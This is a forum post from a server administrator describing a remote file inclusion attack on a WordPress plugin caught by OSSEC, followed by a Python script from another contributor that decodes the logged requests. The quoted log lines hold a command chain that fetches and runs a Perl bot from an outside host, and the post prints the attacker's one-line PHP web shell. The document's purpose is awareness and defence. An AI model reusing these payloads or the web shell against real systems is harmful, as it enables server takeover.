Hi all,
I just wanted to show you all this because I feel I must, so the word can be spread and people are aware of what can happen... I'm sorry, but I didn't know where to place this post; Falko or Till, you may move this post to the appropriate forum if you like... or remove it completely if you like as well...
Firstly, and luckily, I followed Falko's howto on how to install OSSEC HIDS, and I am so glad that I did. I received emails from the server one day; they looked like this...
Quote:
OSSEC HIDS Notification.
2007 May 17 05:59:12
Received From: tracs->/var/log/httpd/access_log
Rule: 31106 fired (level 12) -> "A web attack returned code 200 (success)."
Portion of the log(s):
207.58.129.97 - - [17/May/2007:05:59:11 +1000] "GET /wp-login.php?redirect_to=%2F%2Fwp-content%2Fplugins%2Fwordtube%2Fwordtube-button.php%3FwpPATH%3Dhttp%3A%2F%2Fwww.freewebtown.com%2Fmssn%2Fx%2Fcmd2.txt%3F%26cmd%3Dcd%2B%2Ftmp%3BGET%2Bhttp%3A%2F%2Fwww.freewebtown.com%2Fmssn%2Fx%2Fbot.txt%2B%253E%253E%2Bxbot.txt%3Bperl%2Bbot.txt%3Brm%2B-rf%2Bbot%2A HTTP/1.1" 200 2055 "-" "libwww-perl/5.805"
Quote:
OSSEC HIDS Notification.
2007 May 18 14:17:50
Received From: tracs->/var/log/httpd/access_log
Rule: 31106 fired (level 12) -> "A web attack returned code 200 (success)."
Portion of the log(s):
84.18.204.64 - - [18/May/2007:14:17:50 +1000] "GET /wp-login.php?redirect_to=%2Fwp-content%2Fplugins%2Fwordtube%2Fwordtube-button.php%3FwpPATH%3Dhttp%3A%2F%2Fwww.freewebtown.com%2Fpkspks%2Fcmd.txt%3F%26cmd%3Dcd%2B%2Ftmp%3BGET%2Bhttp%3A%2F%2Fwww.freewebtown.com%2Fpkspks%2Fbot.txt%2B%253E%253E%2Bxbot.txt%3Bperl%2Bbot.txt%3Brm%2B-rf%2Bbot%2A HTTP/1.1" 200 2040 "-" "libwww-perl/5.805"
When you look at it, it simply becomes obvious, for those that can't see it: what it is doing is injecting script into a plugin directory used in WordPress... then GETting some bad scripts, creating a directory, executing those scripts and then deleting the folder the scripts are in.
This is what it looks like...
/wp-login.php?redirect_to= wp-content plugins wordtube wordtube-button.php wpPATH http
www.freewebtown.com mssn cmd2.txt cmd cd tmp GET http
www.freewebtown.com mssn bot.txt bot.txt perl bot.txt rm -rf bot HTTP/1.1" 200 2055 "-" "libwww-perl/5.805"
What I got from this was this...
redirect from /wp-login.php?redirect_to= wp-content/plugins/wordtube/wordtube-button.php
in the wpPATH get
www.freewebtown.com/mssn/cmd2.txt
command cd tmp and
GET http
www.freewebtown.com/mssn/bot.txt
bot.txt perl
bot.txt rm -rf bot
HTTP/1.1" 200 2055 "-" "libwww-perl/5.805"
So I think it's going to the plugin folder wordtube and getting cmd2.txt and cmd.txt and bot.txt, creating a directory called bot, then executing the files using perl, then removing the directory bot and all its content.
Now for the content of these files...
cmd.txt or cmd2.txt content is pretty small...
<?php
/*/
/*
/* CMD by : PKS <pks@cabrones.cl>
/* Website :No Avaliable
/*/
// Open a read-only textarea so the command output displays cleanly in a browser.
echo "<textarea cols=\"80\" rows=\"20\" readonly>";
// Run whatever arrived in the cmd query parameter through the system shell
// and print its output: a one-line web shell, no authentication at all.
system($_GET['cmd']);
die();
?>
http://www.freewebtown.com/pkspks/cmd.txt
This script seems to be creating a textarea that's read-only and then perhaps requesting a system command prompt and then dying...
I'm not that sure of this part.
Now the bot.txt; this one is longer, I might add it to a zip file, but I'm sure that anyone that looks at this script will know that the script is basically doing...
e.g. makes your server join a botnet and uses sendmail to send spam emails, opens and creates its own httpd and sshd, removes logs and tracks, and creates user groups and accounts as well; you get the picture...
Also, another script that is injected is a phpshell script...
Now I'm wondering what to do... fully reinstall the server from scratch or try and clean the server out... somehow...
Well, this is meant to be just an informational thread, just to make people aware of the threats out there...
Well, any type of advice or help would be appreciated...
Just a quick one as well: I would be careful when using any plugins, and make sure they're from a well known and established source; well, sometimes that won't help either...
regards
brainz
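As an added example (not part of brainz's post, and not OSSEC's own code), here is a small Python script that does the decoding brainz did by hand: it parses the two access_log lines quoted in the alerts above, decodes the request twice (once for wp-login.php's redirect_to, once for the query string that the plugin would receive), pulls out the remote wpPATH include URL and the cmd chain, and lists the reasons the line deserves an alert. The field names, the split_query helper and the indicator list are my own; the log lines are the ones from the post.

```python
import re
from urllib.parse import unquote_plus

# The two access_log lines quoted in the OSSEC alerts above (copied from the post).
LOG_LINES = [
    '207.58.129.97 - - [17/May/2007:05:59:11 +1000] "GET /wp-login.php?redirect_to=%2F%2Fwp-content%2Fplugins%2Fwordtube%2Fwordtube-button.php%3FwpPATH%3Dhttp%3A%2F%2Fwww.freewebtown.com%2Fmssn%2Fx%2Fcmd2.txt%3F%26cmd%3Dcd%2B%2Ftmp%3BGET%2Bhttp%3A%2F%2Fwww.freewebtown.com%2Fmssn%2Fx%2Fbot.txt%2B%253E%253E%2Bxbot.txt%3Bperl%2Bbot.txt%3Brm%2B-rf%2Bbot%2A HTTP/1.1" 200 2055 "-" "libwww-perl/5.805"',
    '84.18.204.64 - - [18/May/2007:14:17:50 +1000] "GET /wp-login.php?redirect_to=%2Fwp-content%2Fplugins%2Fwordtube%2Fwordtube-button.php%3FwpPATH%3Dhttp%3A%2F%2Fwww.freewebtown.com%2Fpkspks%2Fcmd.txt%3F%26cmd%3Dcd%2B%2Ftmp%3BGET%2Bhttp%3A%2F%2Fwww.freewebtown.com%2Fpkspks%2Fbot.txt%2B%253E%253E%2Bxbot.txt%3Bperl%2Bbot.txt%3Brm%2B-rf%2Bbot%2A HTTP/1.1" 200 2040 "-" "libwww-perl/5.805"',
]

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one combined-format access_log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def split_query(url):
    """Split 'path?query' and percent-decode the query ONE level.

    Hand-rolled instead of parse_qs because the injected command is full of ';'
    and parse_qs treats ';' as a separator on older Python versions.
    unquote_plus also turns '+' into spaces, exactly as PHP's $_GET does.
    """
    path, _, query = url.partition('?')
    params = {}
    for kv in query.split('&'):
        if not kv:
            continue
        key, _, value = kv.partition('=')
        params[key] = unquote_plus(value)
    return path, params


def decode_attack(uri):
    """Peel the request apart: wp-login.php?redirect_to=<plugin URL> -> plugin URL's wpPATH and cmd."""
    login_page, outer = split_query(uri)
    redirect = outer.get('redirect_to')
    if redirect is None:
        return None
    # Second decoding level: this is what wordtube-button.php would see in its own $_GET.
    # Note the attacker double-encoded '>>' as %253E%253E so it survives both decodings.
    target, inner = split_query(redirect)
    cmd = inner.get('cmd', '')
    return {
        'login_page': login_page,
        'target': target,
        # Trailing '?' on the include URL turns anything the plugin appends into a harmless query string.
        'include_url': inner.get('wpPATH'),
        'commands': [c.strip() for c in cmd.split(';') if c.strip()],
    }


def indicators(fields, decoded):
    """Reasons this line deserves an alert, independent of OSSEC's rule 31106."""
    reasons = []
    include = decoded['include_url'] if decoded else None
    if include and include.startswith(('http://', 'https://')):
        reasons.append('remote URL passed in wpPATH (remote file inclusion attempt)')
    if decoded and decoded['commands']:
        reasons.append('shell command chain in cmd parameter')
    if fields['status'] == '200':
        reasons.append('server answered 200, so the request was not rejected')
    if fields['ua'].startswith('libwww-perl'):
        reasons.append('scripted client (libwww-perl), not a browser')
    return reasons


def analyse(lines):
    """Run every line through the parser and decoder; returns (fields, decoded, reasons) tuples."""
    results = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        decoded = decode_attack(fields['uri'])
        results.append((fields, decoded, indicators(fields, decoded)))
    return results


if __name__ == '__main__':
    for fields, decoded, reasons in analyse(LOG_LINES):
        print(f"{fields['ip']} [{fields['ts']}] -> {decoded['target']}")
        print("  include:", decoded['include_url'])
        for c in decoded['commands']:
            print("  cmd:", c)
        for r in reasons:
            print("  !", r)
```

For the first line this yields the include URL http://www.freewebtown.com/mssn/x/cmd2.txt? and the chain `cd /tmp`, `GET http://www.freewebtown.com/mssn/x/bot.txt >> xbot.txt`, `perl bot.txt`, `rm -rf bot*`. One caveat when reading these alerts: the 200 here is wp-login.php answering, so the decoded chain is what the attacker intended, not proof it ran. Grep the same log for direct hits on wordtube-button.php and check /tmp before deciding between cleaning and a rebuild.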